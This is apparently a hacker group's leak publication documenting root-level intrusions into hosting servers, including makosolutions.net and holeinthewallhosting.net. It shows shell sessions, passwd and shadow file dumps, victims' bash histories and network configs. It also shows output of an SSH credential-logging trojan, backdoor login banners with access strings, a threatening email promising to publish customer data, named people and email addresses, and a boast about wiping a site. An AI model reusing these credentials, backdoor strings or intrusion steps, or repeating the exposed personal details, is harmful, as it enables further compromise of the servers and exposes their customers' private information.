+jb007:x:32183:32185::/home/jb007:/usr/local/cpanel/bin/jailshell
+timc:x:32185:32187::/home/timc:/usr/local/cpanel/bin/noshell
+munin:x:32186:32188::/home/munin:/bin/bash
+noct:x:32187:32189::/home/noct:/usr/local/cpanel/bin/jailshell
+jeffhem:x:32188:32190::/home/jeffhem:/usr/local/cpanel/bin/noshell
+chemmer:x:32189:32191::/home/chemmer:/usr/local/cpanel/bin/noshell
+daelenbe:x:32190:32192::/home/daelenbe:/usr/local/cpanel/bin/noshell
+deevour:x:32191:32193::/home/deevour:/bin/bash
+raven:x:32192:32194::/home/raven:/usr/local/cpanel/bin/noshell
+lithium:x:32193:32195::/home/lithium:/usr/local/cpanel/bin/noshell
+netdevil:x:510:510::/home/netdevil:/usr/local/cpanel/bin/noshell
+sub:x:511:511::/home/sub:/usr/local/cpanel/bin/noshell
+r00t:x:512:512::/home/r00t:/usr/local/cpanel/bin/noshell
+maraka:x:513:513::/home/maraka:/usr/local/cpanel/bin/noshell
+root@light [/home]# 
+
+
+root@light [~]# ifconfig -a
+eth0      Link encap:Ethernet  HWaddr 00:50:8D:C2:F0:C9  
+          inet addr:66.197.170.181  Bcast:66.197.170.191  Mask:255.255.255.240
+          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
+          RX packets:66876060 errors:0 dropped:0 overruns:0 frame:0
+          TX packets:81485342 errors:0 dropped:1 overruns:0 carrier:0
+          collisions:0 txqueuelen:1000 
+          RX bytes:652037555 (621.8 MiB)  TX bytes:1600708482 (1.4 GiB)
+          Interrupt:16 Base address:0xd000 
+
+eth0:1    Link encap:Ethernet  HWaddr 00:50:8D:C2:F0:C9  
+          inet addr:66.197.170.182  Bcast:66.197.170.255  Mask:255.255.255.0
+          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
+          Interrupt:16 Base address:0xd000 
+
+eth0:2    Link encap:Ethernet  HWaddr 00:50:8D:C2:F0:C9  
+          inet addr:66.197.170.183  Bcast:66.197.170.255  Mask:255.255.255.0
+          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
+          Interrupt:16 Base address:0xd000 
+
+eth0:3    Link encap:Ethernet  HWaddr 00:50:8D:C2:F0:C9  
+          inet addr:66.197.170.185  Bcast:66.197.170.255  Mask:255.255.255.0
+          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
+          Interrupt:16 Base address:0xd000 
+
+eth0:4    Link encap:Ethernet  HWaddr 00:50:8D:C2:F0:C9  
+          inet addr:66.197.170.186  Bcast:66.197.170.255  Mask:255.255.255.0
+          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
+          Interrupt:16 Base address:0xd000 
+
+eth0:5    Link encap:Ethernet  HWaddr 00:50:8D:C2:F0:C9  
+          inet addr:66.197.170.184  Bcast:66.197.170.255  Mask:255.255.255.0
+          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
+          Interrupt:16 Base address:0xd000 
+
+gre0      Link encap:UNSPEC  HWaddr 00-00-00-00-FF-00-00-00-00-00-00-00-00-00-00-00  
+          NOARP  MTU:1476  Metric:1
+          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
+          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
+          collisions:0 txqueuelen:0 
+          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
+
+lo        Link encap:Local Loopback  
+          inet addr:127.0.0.1  Mask:255.0.0.0
+          UP LOOPBACK RUNNING  MTU:16436  Metric:1
+          RX packets:38383139 errors:0 dropped:0 overruns:0 frame:0
+          TX packets:38383139 errors:0 dropped:0 overruns:0 carrier:0
+          collisions:0 txqueuelen:0 
+          RX bytes:3605264865 (3.3 GiB)  TX bytes:3605264865 (3.3 GiB)
+
+tunl0     Link encap:IPIP Tunnel  HWaddr   
+          NOARP  MTU:1480  Metric:1
+          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
+          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
+          collisions:0 txqueuelen:0 
+          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
+
+root@light [~]# cat /var/named/ownage.net.db
+; Modified by Web Host Manager
+; Zone File for ownage.net
+$TTL 14400
+@       86400   IN      SOA     dns.vitalspeeds.com.    support.vitalspeeds.com.        (
+                                        2006111702
+                                        86400
+                                        7200
+                                        3600000
+                                        86400
+                                        )
+
+ownage.net.     86400   IN      NS      dns.vitalspeeds.com.
+ownage.net.     86400   IN      NS      ns2.vitalspeeds.com.
+
+
+ownage.net.     14400   IN      A       72.20.28.204
+
+localhost.ownage.net.   14400   IN      A       127.0.0.1
+
+ownage.net.     14400   IN      MX      0       ownage.net.
+
+mail    14400   IN      CNAME   ownage.net.
+www     14400   IN      CNAME   ownage.net.
+ftp     14400   IN      CNAME   ownage.net.
+absolute.ownage.net.    14400   IN      A       72.20.28.205
+talk.about.ownage.net.  14400   IN      A       72.20.18.131
+complete.ownage.net.    14400   IN      A       72.20.28.206
+
+
+
+
+_______         _______   .________
+\   _  \ ___  __\   _  \  |   ____/
+/  /_\  \\  \/  /  /_\  \ |____  \ 
+\  \_/   \>    <\  \_/   \/       \
+ \_____  /__/\_ \\_____  /______  /
+       \/      \/      \/       \/ 
+                __                     .__          __  .__                      
+  _____ _____  |  | ______  __________ |  |  __ ___/  |_|__| ____   ____   ______
+ /     \\__  \ |  |/ /  _ \/  ___/  _ \|  | |  |  \   __\  |/  _ \ /    \ /  ___/
+|  Y Y  \/ __ \|    <  <_> )___ (  <_> )  |_|  |  /|  | |  (  <_> )   |  \\___ \ 
+|__|_|  (____  /__|_ \____/____  >____/|____/____/ |__| |__|\____/|___|  /____  >
+      \/     \/     \/         \/                                      \/     \/ 
+          __________                _________              
+          \______   \_______  ____ /   _____/ ____   ____  
+  ______   |     ___/\_  __ \/  _ \\_____  \_/ __ \_/ ___\ 
+ /_____/   |    |     |  | \(  <_> )        \  ___/\  \___ 
+           |____|     |__|   \____/_______  /\___  >\___  >
+                                          \/     \/     \/ 
+
+
+Delivered-To: glafkos@gmail.com
+Received: by 10.223.117.209 with SMTP id s17cs437044faq;
+        Thu, 2 Jul 2009 13:31:48 -0700 (PDT)
+Received: by 10.224.67.129 with SMTP id r1mr663571qai.234.1246566706699;
+        Thu, 02 Jul 2009 13:31:46 -0700 (PDT)
+Return-Path: 
+Received: from blu0-omc4-s21.blu0.hotmail.com (blu0-omc4-s21.blu0.hotmail.com [65.55.111.160])
+        by mx.google.com with ESMTP id 2si5595246yxe.16.2009.07.02.13.31.45;
+        Thu, 02 Jul 2009 13:31:46 -0700 (PDT)
+Received-SPF: pass (google.com: domain of glafk0s@hotmail.com designates 65.55.111.160 as permitted sender) client-ip=65.55.111.160;
+Authentication-Results: mx.google.com; spf=pass (google.com: domain of glafk0s@hotmail.com designates 65.55.111.160 as permitted sender) smtp.mail=glafk0s@hotmail.com
+Received: from BLU123-W9 ([65.55.111.135]) by blu0-omc4-s21.blu0.hotmail.com with Microsoft SMTPSVC(6.0.3790.3959);
+	 Thu, 2 Jul 2009 13:31:22 -0700
+Message-ID: 
+Return-Path: glafk0s@hotmail.com
+Content-Type: multipart/alternative;
+	boundary="_817cc510-a5cf-4a68-bec3-2a43760f95ae_"
+
+
+X-Originating-IP: [188.51.85.13] // You still have a lot to learn :)
+
+
+From: james knuth 
+To: , , ,
+	, , ,
+	, ,
+	, , ,
+	, ,
+	, , ,
+	, ,
+	, ,
+	, ,
+	, , ,
+	
+Subject: Makosolutions, LLC
+Date: Thu, 2 Jul 2009 22:31:22 +0200
+Importance: Normal
+MIME-Version: 1.0
+X-OriginalArrivalTime: 02 Jul 2009 20:31:22.0341 (UTC) FILETIME=[10245150:01C9FB54]
+
+MakoSolutions, LLC // The remaining content of this email has been provided to the proper authorities
+    - Hacked.
+
+I will keep this short and simple, you hosted someone I want down and I decided to take down your company 
+and publish your customers information for that.
+
+// This is not your game anymore "Faisal Hourani". It seems that your anti-sec ideals were just excuses..
+
+
+HOOKOUT: 67.225.142.98 0x3aownt:rKDcb-54ZJ
+
+                +----------------------------[ Owned ]----------------------------+
+                |          Hack everyone you can and then hack some more          |
+                |                           Owned[DC] v2                          |
+                |                   _______ . _______ . _______                   |
+                |             Get in as anonymous, Leave with no trace.           |
+                |                                                                 |
+                +-----------------------------------------------------------------+
+         [ Linux puma.makosolutions.net 2.6.9-67.0.1.ELsmp i686 ]
+
+ 08:24:44 up 519 days, 11:20,  3 users,  load average: 0.05, 0.10, 0.09
+makos2   pts/1        61.17.231.6      Fri Jun 26 08:12   still logged in   
+makos2   pts/3        61.17.231.6      Fri Jun 26 04:10 - 04:25  (00:15)    
+makos2   pts/7        61.17.231.6      Fri Jun 26 04:09 - 04:09  (00:00)    
+makos2   pts/5        61.17.231.6      Fri Jun 26 03:58 - 04:09  (00:11)    
+makos2   pts/4        61.17.231.6      Fri Jun 26 03:54   still logged in   
+
+wtmp begins Tue Jun  2 01:09:06 2009
+Owned[DC]:[~]# date
+Fri Jun 26 08:26:44 EDT 2009
+Owned[DC]:[~]# uname -a
+Linux puma.makosolutions.net 2.6.9-67.0.1.ELsmp #1 SMP Wed Dec 19 16:01:12 EST 2007 i686 athlon i386 GNU/Linux
+Owned[DC]:[~]# 
+
+
+Owned[DC]:[~]# cd /var/run/ssh
+Owned[DC]:[/var/run]# gcc -o decode decode.c 
+Owned[DC]:[/var/run]# ./decode ssh.old 
+HOOKOUT: 67.225.142.98 root:_censored_
+HOOKIN: root:_censored_
+HOOKOUT: 66.96.220.213 root:_censored_
+.
+.
+.
+HOOKIN: makos2:_censored_
+HOOKOUT: 64.191.116.202 root:_censored_
+
+Owned[DC]:[/var/run]# w
+ 08:32:59 up 519 days, 11:28,  3 users,  load average: 0.23, 0.22, 0.13
+USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
+makos2   pts/0    61.17.231.6      03:53    3:54   0.13s  0.00s sshd: makos2 [priv]
+makos2   pts/1    61.17.231.6      08:12    6.00s  0.06s  0.01s sshd: makos2 [priv]
+makos2   pts/4    61.17.231.6      03:54   18:40   0.02s  0.01s sshd: makos2 [priv]
+Owned[DC]:[/var/run]# 
+
+Owned[DC]:[/var/run]# cat /etc/shadow
+root:_censored_:14418:0:99999:7:::
+bin:*:13901:0:99999:7:::
+daemon:*:13901:0:99999:7:::
+adm:*:13901:0:99999:7:::
+lp:*:13901:0:99999:7:::
+sync:*:13901:0:99999:7:::
+shutdown:*:13901:0:99999:7:::
+halt:*:13901:0:99999:7:::
+mail:*:13901:0:99999:7:::
+news:*:13901:0:99999:7:::
+uucp:*:13901:0:99999:7:::
+operator:*:13901:0:99999:7:::
+games:*:13901:0:99999:7:::
+gopher:*:13901:0:99999:7:::
+ftp:*:13901:0:99999:7:::
+nobody:*:13901:0:99999:7:::
+dbus:!!:13901:0:99999:7:::
+vcsa:!!:13901:0:99999:7:::
+rpm:!!:13901:0:99999:7:::
+haldaemon:!!:13901:0:99999:7:::
+netdump:!!:13901:0:99999:7:::
+nscd:!!:13901:0:99999:7:::
+sshd:!!:13901:0:99999:7:::
+rpc:!!:13901:0:99999:7:::
+mailnull:!!:13901:0:99999:7:::
+smmsp:!!:13901:0:99999:7:::
+pcap:!!:13901:0:99999:7:::
+xfs:!!:13901:0:99999:7:::
+pegasus:!!:13901:0:99999:7:::
+mysql:!!:13901::::::
+mailman:*:13901::::::
+cpanel:*:13901::::::
+systuser:!!:13901:0:99999:7:::
+named:!!:13901::::::
+clamav:!!:13901::::::
+dorothy:_censored_:14126:0:99999:7:::
+fileport:_censored_:13902:0:99999:7:::
+icstune:_censored_:13902:0:99999:7:::
+krisez:_censored_$LRTAc0.mSw4a72zaVSGJd0:13902:0:99999:7:::
+kurwaun:_censored_$Y5V5WC30jDTB7h2HEuPWv0:13902:0:99999:7:::
+makos:_censored_$6sPV/Yt2K90ah60vxrRE/.:14418:0:99999:7:::
+makos2:_censored_$gUs1XceJmqOgEaHbeaQJN/:14418:0:99999:7:::
+marcin:_censored_$CZjERtIuP0ob.TJhixQr5.:13902:0:99999:7:::
+mdots:_censored_$JCyJyAL8iXQMeOQbF0jMo.:13902:0:99999:7:::
+mklounge:_censored_$1Uw2zWBge5A2GLQqWS5Mn.:13902:0:99999:7:::
+nashv:_censored_$h/475XUYdCfNl2N.mgPgV0:13902:0:99999:7:::
+rogo:_censored_$6V878RKV1W/E4NPoGJHKu/:14192:0:99999:7:::
+spanish:_censored_$h902kmWzyxUw1wwSMWWyp/:13902:0:99999:7:::
+sprynet:_censored_$Zm2b8RGX0d8/qo5tSuJA3/:13902:0:99999:7:::
+statewi:_censored_$EPK2zdk0Z9ET48XrRcsKJ1:14376:0:99999:7:::
+tarocon:_censored_$6me2YVq3JQ0PeDFLV7Aml0:14073:0:99999:7:::
+sprycha:_censored_$osQE8JvfI0lC/r464r1.30:13903:0:99999:7:::
+hplounge:_censored_$59BBs5nOeFGPRO8hEj1F1.:13922:0:99999:7:::
+cozy:_censored_$tj.rlOAmhdwJm6fdWPvv2.:13923:0:99999:7:::
+cpanel-horde:*:13949::::::
+cpanel-phpmyadmin:*:13949::::::
+cpanel-phppgadmin:*:13949::::::
+makospam:_censored_$9mTDWRT8N8NZ7hFUa.2Iv1:13962:0:99999:7:::
+wiredbre:_censored_$jc6LduZz25ERlx0SSp6I8.:13980:0:99999:7:::
+cybermun:_censored_$gSpGZJCyrf5eKoKXzoknb/:13984:0:99999:7:::
+proto:_censored_$fuGMvBK.mAz7AO989Reqm/:14208:0:99999:7:::
+tempecon:_censored_$M3wPHFn06YfnjqhpOoSis1:13995:0:99999:7:::
+floralsi:_censored_$jboZSeeKKAecDPW7Xi8r01:13995:0:99999:7:::
+serversh:_censored_$oh7hdFXLoQM7BtHaVIwDB0:13997:0:99999:7:::
+simplify:_censored_$FRrjF78SYaCEyBK/zX9rU0:14025:0:99999:7:::
+themunst:_censored_$YHtOc1ylvVbXQjSjCuMMS.:14017:0:99999:7:::
+theregoe:_censored_$U1OUx/hznz7Z/cRxknMpV1:14019:0:99999:7:::
+xbox360t:_censored_$52N4Y3wbF4I.j0xw0ybZv0:14027:0:99999:7:::
+barbiedo:_censored_$dYASLs0QEHczZNK/xO4l60:14033:0:99999:7:::
+c20q8anz:_censored_$5yj/Vw9bVQE1H8gFGnfwl0:14031:0:99999:7:::
+bashingr:_censored_$40Rbu9u.CdR54/.QGx5hZ.:14034:0:99999:7:::
+hawaiian:_censored_$YXD5Fqnc1wa47hXw5DS1z/:14036:0:99999:7:::
+cnewyork:_censored_$auEIntz4K2naChQ6A8j42.:14035:0:99999:7:::
+lasvegas:_censored_$O8g7FiIF7Z.G1BLakQhjl.:14035:0:99999:7:::
+contourp:_censored_$Mhq3nTK4slo39beK7mAsV/:14036:0:99999:7:::
+musiconl:_censored_$g.3Wk0K3xRAd8bzMfetZz0:14036:0:99999:7:::
+jokesfor:_censored_$332BH8Z2tQ1.PoLUj0aeQ.:14036:0:99999:7:::
+cpanelhorde:*:14037::::::
+cpanelphpmyadmin:*:14037::::::
+cpanelphppgadmin:*:14037::::::
+cpanelroundcube:*:14037::::::
+okcityco:_censored_$sRF34svAMlqkUvqPQyEXq/:14039:0:99999:7:::
+pasadena:_censored_$IDwtddZgxQPTnlqIEiRd/.:14039:0:99999:7:::
+ionsigns:_censored_$Vg7G3SaNWflS1zTsWy.b50:14292:0:99999:7:::
+cherubim:_censored_$DIouDCIf0zrNJHJj1Hijy0:14042:0:99999:7:::
+sanfranc:_censored_$G1VXarugAKLCe0mTh1mjz1:14042:0:99999:7:::
+jillrace:_censored_$GWkRrIh91Slq3d4fP4Ysh/:14042:0:99999:7:::
+portland:_censored_$9RiJMMNQaYXloc80zzyve/:14042:0:99999:7:::
+newyorkc:_censored_$r/hkQYZAe3aMB2h72VDVE.:14042:0:99999:7:::
+renoconc:_censored_$HreCJL6jaESpLR4GNQU2X0:14042:0:99999:7:::
+indianap:_censored_$K69/LXuR2.0309THXC3IR1:14042:0:99999:7:::
+lvconcer:_censored_$0SOI7NDDrTatWwv1qUtKw.:14042:0:99999:7:::
+miamicon:_censored_$10LHNdaYHowHSELzvFlfW.:14042:0:99999:7:::
+whatupla:_censored_$qBSgboCAfNT0K55szVNGv0:14322:0:99999:7:::
+zconcert:_censored_$kj.cK7mz2sEam.1wusPIQ1:14042:0:99999:7:::
+tokyocon:_censored_$bdBjHYHi4oSDqBsL/yHuS0:14042:0:99999:7:::
+uhouston:_censored_$x/aaM4f.jxN1wMDYHnc/h.:14042:0:99999:7:::
+raleigh:_censored_$tEFo7l/iuN.pRKxTSlCCe1:14042:0:99999:7:::
+flagstaf:_censored_$mKfuTWqfxbt3X1ddt5fUK/:14042:0:99999:7:::
+phoenixa:_censored_$5R9rVBeLzwZtIXTgSbfI9/:14042:0:99999:7:::
+ap6mz0q2:_censored_$cfbHH6J9VN9UOr3KBZ9ts.:14042:0:99999:7:::
+xq9s3ma:_censored_$vVfRtpDm4j1Uj08OcYmwG1:14044:0:99999:7:::
+jacksonv:_censored_$yOc3XavkD3xVFrV/IyvKF.:14046:0:99999:7:::
+exspry:_censored_$R/sFQOBW4EgGIThYQj28k.:14047:0:99999:7:::
+exmako:_censored_$/YcknpKQlOCdzVzgWbJRM/:14048:0:99999:7:::
+quagmire:_censored_$IrcWo57PYhw9lyNR8FlqR.:14049:0:99999:7:::
+njmakos:_censored_$eLWUwH4sqaSjYNDDQD8uc.:14049:0:99999:7:::
+vicscust:_censored_$zD1TjhIzUZXrqOlHSMKDv0:14220:0:99999:7:::
+losangel:_censored_$ApXNU5tVAZvvTZ8wKhfrG0:14053:0:99999:7:::
+newengla:_censored_$1inQwoEWSRR/mbuH/U8fj1:14053:0:99999:7:::
+lvconven:_censored_$Pi1JPn.1OrKH5JaI5GjPf0:14055:0:99999:7:::
+lvtrades:_censored_$dr.bC2FHXaV6QITM0lmbn1:14055:0:99999:7:::
+nyctrade:_censored_$dAeNUEisO8nI1GxoDK7Bq0:14055:0:99999:7:::
+services:_censored_$/MGwtjcf.Ru7o7y/HDd6P/:14068:0:99999:7:::
+worships:_censored_$DD7lYOZiW2VfGQARqj4Nw/:14070:0:99999:7:::
+eworship:_censored_$/RA2I.4drunr/Q5sEk/gA1:14070:0:99999:7:::
+aemotors:_censored_$yHBjKMyrCFRYaGnSuAc420:14083:0:99999:7:::
+workfrom:_censored_$8whIbBBBjYzZxgDDDuMde.:14091:0:99999:7:::
+megaspel:_censored_$aO1t9Wneps4O6nDXFn.84/:14093:0:99999:7:::
+espel:_censored_$PNoLG3/nFppUcjJB7Ndkc1:14093:0:99999:7:::
+dyna:_censored_$oeAPTO2pNcYr7jguVfS.o0:14097:0:99999:7:::
+niklas:_censored_$MLPe0p9S4Wz.ficqPiWE3.:14098:0:99999:7:::
+glendale:_censored_$36WbIrHoaY6p.wQHDMKSI/:14112:0:99999:7:::
+theworkf:_censored_$k9UTdl9Xszol3vXe8XJex/:14113:0:99999:7:::
+missreso:_censored_$cMQPqmDGUCrI5GCTJ95IW1:14114:0:99999:7:::
+theletro:_censored_$uSdV14r/ad2VSUSQN076J1:14137:0:99999:7:::
+simobilg:_censored_$lgR0ZcRPsacgrXN0CyTph/:14163:0:99999:7:::
+concert:_censored_$u78BVeFn/9dqijD5FxFn30:14167:0:99999:7:::
+worldsbe:_censored_$KhYsNIhpV/9MpNLsJ7KkD1:14176:0:99999:7:::
+x1qo0xmz:_censored_$35pb2Tt3NF7mcdwa8ij0S/:14210:0:99999:7:::
+american:_censored_$f64FdDQZShu/QPCT01cig.:14212:0:99999:7:::
+firstrat:_censored_$Cg447uD7Pf1PSfs03LyFI0:14217:0:99999:7:::
+xq05vz73:_censored_$H96kS5lH6gbiK3ShSPwJG.:14219:0:99999:7:::
+imsauto:_censored_$18x.Al7E/c8nKVG5w4ge90:14225:0:99999:7:::
+headwayp:_censored_$5.CQnCYJzlFnw10dJB1fo/:14253:0:99999:7:::
+performa:_censored_$RXFC0.Y9sd19TL59ulzBy0:14248:0:99999:7:::
+snowboar:_censored_$S0pOHKtr37Qp283oBChtz0:14246:0:99999:7:::
+importeu:_censored_$0vHEmwZW2WImMY8i961N7.:14260:0:99999:7:::
+holyschn:_censored_$yyYCxFr6MAeXOFS4uGZxE1:14262:0:99999:7:::
+rivercit:_censored_$JhMlSLJOJxGB84SdIX9VL0:14271:0:99999:7:::
+perform:_censored_$MwABPul6js/dDkESj3NCa/:14334:0:99999:7:::
+sco:_censored_$mD1J7V6/XgnGKexigg7ZQ/:14342:0:99999:7:::
+austinar:_censored_$kwPledBlp5.5FRj7TCsXF.:14349:0:99999:7:::
+arlingto:_censored_$HOPfqdVPLDjcKYOYXBssZ.:14350:0:99999:7:::
+albuquer:_censored_$IIfpFNji/HFkgySU9QPyZ.:14350:0:99999:7:::
+jvconcer:_censored_$Up603l0cXWF0BisBD010v/:14352:0:99999:7:::
+sanjosec:_censored_$6lZMqhYCRgu07TQSTca1D.:14352:0:99999:7:::
+sdconcer:_censored_$jsdhywYTV6.yqzfh7IApB1:14352:0:99999:7:::
+bukemark:_censored_$giCqM37r16fagpVb.7SlB/:14363:0:99999:7:::
+laconcer:_censored_$WBI4s4H3O7Slpsk7zrZpj.:14366:0:99999:7:::
+dforce:_censored_$fjjNVrQw8LPQCDcgXRUkc1:14392:0:99999:7:::
+
+Owned[DC]:[/backup]# cat ~/.bash_history
+ssh 64.191.54.229 -l butts 
+#1244614734
+ssh 64.191.54.229 -l butts
+#1244651529
+ssh butts@64.191.54.229
+#1244644856
+ssh 66.96.220.213 -l makosolutions 
+#1244644866
+ssh 66.96.220.213 -l makosolutions -p 2222 
+#1244645088
+ssh 66.96.220.213 -l mako -p 2222
+#1244650823
+top -c
+#1244651468
+ssh 66.96.220.213
+#1244651606
+ssh 66.96.220.213 -l makosolutions 
+#1244659374
+ifconfig | grep 67.225.142.98
+#1244659384
+ssh -l butts server.holeinthewallhosting.com
+#1244659474
+nmap server.holeinthewallhosting.com
+#1244659875
+ssh -l butts server.holeinthewallhosting.com
+#1244659891
+ssh -l butts 64.191.54.229
+#1244677757
+ssh -l  makosolutions  66.96.220.213 
+#1244810932
+exit
+#1244944507
+ssh 64.191.54.229 -l butts
+#1244971944
+ssh -l butts 64.191.54.229
+#1245004682
+ssh 64.191.116.203
+#1245013655
+exit
+#1245067142
+ssh 66.96.220.213
+#1245062070
+ssh 66.96.220.213
+#1245074394
+ssh 64.191.116.203
+#1245076716
+exit
+#1245058974
+ssh 66.96.220.213
+#1245082594
+ssh 64.191.116.203
+#1245141381
+grep nukelar.reality-matrix.org /etc/trueuserdomains 
+#1245141388
+grep nukelar.reality-matrix.org /etc/userdomains 
+#1245141593
+ssh 64.191.116.203
+#1245161918
+ssh 66.96.220.213
+#1245161939
+telnet 66.96.220.213 22
+#1245161953
+telnet 66.96.220.213 53
+#1245161969
+nmap 66.96.220.213
+#1245162042
+ssh 66.96.220.213 -p 80
+#1245147550
+ssh 64.191.116.203
+#1244659875
+ssh -l butts server.holeinthewallhosting.com
+#1244659891
+ssh -l butts 64.191.54.229
+#1244677757
+ssh -l  makosolutions  66.96.220.213 // infosec.org.uk
+#1244810932
+exit
+#1244944507
+ssh 64.191.54.229 -l butts
+#1244971944
+ssh -l butts 64.191.54.229
+#1245004682
+ssh 64.191.116.203
+#1245013655
+exit
+#1245067142
+ssh 66.96.220.213
+#1245062070
+ssh 66.96.220.213
+#1245074394
+ssh 64.191.116.203
+#1245076716
+exit
+#1245058974
+ssh 66.96.220.213
+#1245082594
+ssh 64.191.116.203
+#1245141381
+grep nukelar.reality-matrix.org /etc/trueuserdomains 
+#1245141388
+grep nukelar.reality-matrix.org /etc/userdomains 
+#1245141593
+ssh 64.191.116.203
+#1245161918
+ssh 66.96.220.213
+#1245161939
+telnet 66.96.220.213 22
+#1245161953
+telnet 66.96.220.213 53
+#1245161969
+nmap 66.96.220.213
+#1245162042
+ssh 66.96.220.213 -p 80
+#1245147550
+ssh 64.191.116.203
+#1245184460
+ssh 66.96.220.213
+#1245199770
+ssh -l makosolutions 66.96.220.213 
+#1245318670
+vi /etc/csf/csf.denyip
+#1245318687
+ssh 66.96.220.213
+#1245318707
+ssh root@66.96.220.213
+#1245318749
+ssh mako@66.96.220.213 -p2222
+#1245318770
+ssh mako@66.96.220.213 -p 2222
+#1245318842
+ssh mako@66.96.220.213 -p2222
+#1245316906
+ssh 66.7.198.124
+#1245317031
+ssh 66.7.198.124
+#1245317159
+ssh 66.96.220.213
+#1245318179
+ssh  66.96.220.213
+#1245319038
+ssh 67.225.159.152 
+#1245319073
+ssh 67.225.159.152 -p22
+#1245319077
+ssh 67.225.159.152 -p 22
+.
+.
+.
+csf -l | grep 66.96.211.181
+#1245999632
+apf
+#1246000060
+ssh 66.96.211.181 -l root
+#1246000637
+grep 66.96.211.181 /var/log/messages
+#1246002631
+cat /usr/local/psa/version
+#1246002640
+ls /usr/local/psa/version
+#1246015247
+ls /usr/local/psa/version
+#1245998530
+ssh 64.191.72.85
+#1245998556
+telnet 64.191.72.85 25
+#1245998595
+vzlist -a
+#1246001328
+ssh 64.191.72.85
+
+Owned[DC]:[/backup]# df -h
+Filesystem            Size  Used Avail Use% Mounted on
+/dev/sda7             2.0G  426M  1.5G  23% /
+/dev/sdb1             147G   61G   79G  44% /backup
+/dev/sda1            1012M   46M  915M   5% /boot
+none                  2.0G     0  2.0G   0% /dev/shm
+/dev/sda8             121G   32G   83G  28% /home
+/dev/sda6             2.0G   37M  1.9G   2% /tmp
+/dev/sda2             9.9G  5.6G  3.9G  60% /usr
+/dev/sda5             9.9G  2.1G  7.3G  23% /var
+/tmp                  2.0G   37M  1.9G   2% /var/tmp
+Owned[DC]:[/backup]# 
+
+Owned[DC]:[/etc/pam.d]# cat sshd 
+#%PAM-1.0
+auth       required     pam_stack.so service=system-auth
+auth       required     pam_nologin.so
+account    required     pam_stack.so service=system-auth
+password   required     pam_stack.so service=system-auth
+session    required     pam_stack.so service=system-auth
+session    required     pam_loginuid.so
+
+auth       required     pam_shells.so 
+
+Owned[DC]:[/var/run]# hostname
+puma.makosolutions.net
+Owned[DC]:[/var/run]# 
+
+Owned[DC]:[~]# lsof -i TCP:22
+COMMAND   PID   USER   FD   TYPE    DEVICE SIZE NODE NAME
+sshd    17433   root    3u  IPv6 791605626       TCP puma.makosolutions.net:ssh->ABTS-KK-dynamic-175.123.172.122.airtelbroadband.in:60137 (ESTABLISHED)
+sshd    17441 makos2    3u  IPv6 791605626       TCP puma.makosolutions.net:ssh->ABTS-KK-dynamic-175.123.172.122.airtelbroadband.in:60137 (ESTABLISHED)
+sshd    21409   root    3u  IPv6 791273811       TCP puma.makosolutions.net:ssh->ABTS-KK-dynamic-175.123.172.122.airtelbroadband.in:46198 (ESTABLISHED)
+sshd    21412 makos2    3u  IPv6 791273811       TCP puma.makosolutions.net:ssh->ABTS-KK-dynamic-175.123.172.122.airtelbroadband.in:46198 (ESTABLISHED)
+sshd    26799   root    3u  IPv6 791290938       TCP puma.makosolutions.net:ssh->ABTS-KK-dynamic-175.123.172.122.airtelbroadband.in:52436 (ESTABLISHED)
+sshd    26806 makos2    3u  IPv6 791290938       TCP puma.makosolutions.net:ssh->ABTS-KK-dynamic-175.123.172.122.airtelbroadband.in:52436 (ESTABLISHED)
+ssh     26887   root    3u  IPv4 791291132       TCP puma.makosolutions.net:42625->serv.localhost:ssh (ESTABLISHED)
+sshd    29596   root    3u  IPv6 791533593       TCP puma.makosolutions.net:ssh->188.51.85.13:34957 (ESTABLISHED) 
+// RoMeO logged in just before the rm -rf / of makosolutions.com
+sshd    30850   root    3u  IPv6 783032196       TCP *:ssh (LISTEN)
+
+
+
+_______         _______    ________
+\   _  \ ___  __\   _  \  /  _____/
+/  /_\  \\  \/  /  /_\  \/   __  \ 
+\  \_/   \>    <\  \_/   \  |__\  \
+ \_____  /__/\_ \\_____  /\_____  /
+       \/      \/      \/       \/ 
+.__           .__         .__        __  .__                          .__  .__   
+|  |__   ____ |  |   ____ |__| _____/  |_|  |__   ______  _  _______  |  | |  |  
+|  |  \ /  _ \|  | _/ __ \|  |/    \   __\  |  \_/ __ \ \/ \/ /\__  \ |  | |  |  
+|   Y  (  <_> )  |_\  ___/|  |   |  \  | |   Y  \  ___/\     /  / __ \|  |_|  |__
+|___|  /\____/|____/\___  >__|___|  /__| |___|  /\___  >\/\_/  (____  /____/____/
+     \/                 \/        \/          \/     \/             \/           
+.__                    __  .__                          
+|  |__   ____  _______/  |_|__| ____    ____            
+|  |  \ /  _ \/  ___/\   __\  |/    \  / ___\    ______ 
+|   Y  (  <_> )___ \  |  | |  |   |  \/ /_/  >  /_____/ 
+|___|  /\____/____  > |__| |__|___|  /\___  /           
+     \/           \/               \//_____/            
+__________                _________              
+\______   \_______  ____ /   _____/ ____   ____  
+ |     ___/\_  __ \/  _ \\_____  \_/ __ \_/ ___\ 
+ |    |     |  | \(  <_> )        \  ___/\  \___ 
+ |____|     |__|   \____/_______  /\___  >\___  >
+                                \/     \/     \/ 
+
+
+64.191.54.229 0x3aownt:DlE46Y8KpH
+                +----------------------------[ Owned ]----------------------------+
+                |          Hack everyone you can and then hack some more          |
+                |                           Owned[DC] v2                          |
+                |                   _______ . _______ . _______                   |
+                |             Get in as anonymous, Leave with no trace.           |
+                |                                                                 |
+                +-----------------------------------------------------------------+
+         [ Linux server.holeinthewallhosting.net 2.6.18-92.1.10.el5 i686 ]
+
+ 11:12:13 up 78 days, 17:02,  0 users,  load average: 1.73, 2.17, 2.23
+mrich    pts/0        75-28-177-133.li Thu Jun 25 22:40 - 22:47  (00:06)    
+jayzer   pts/1        cpe-76-183-78-13 Thu Jun 25 00:45 - 00:49  (00:04)    
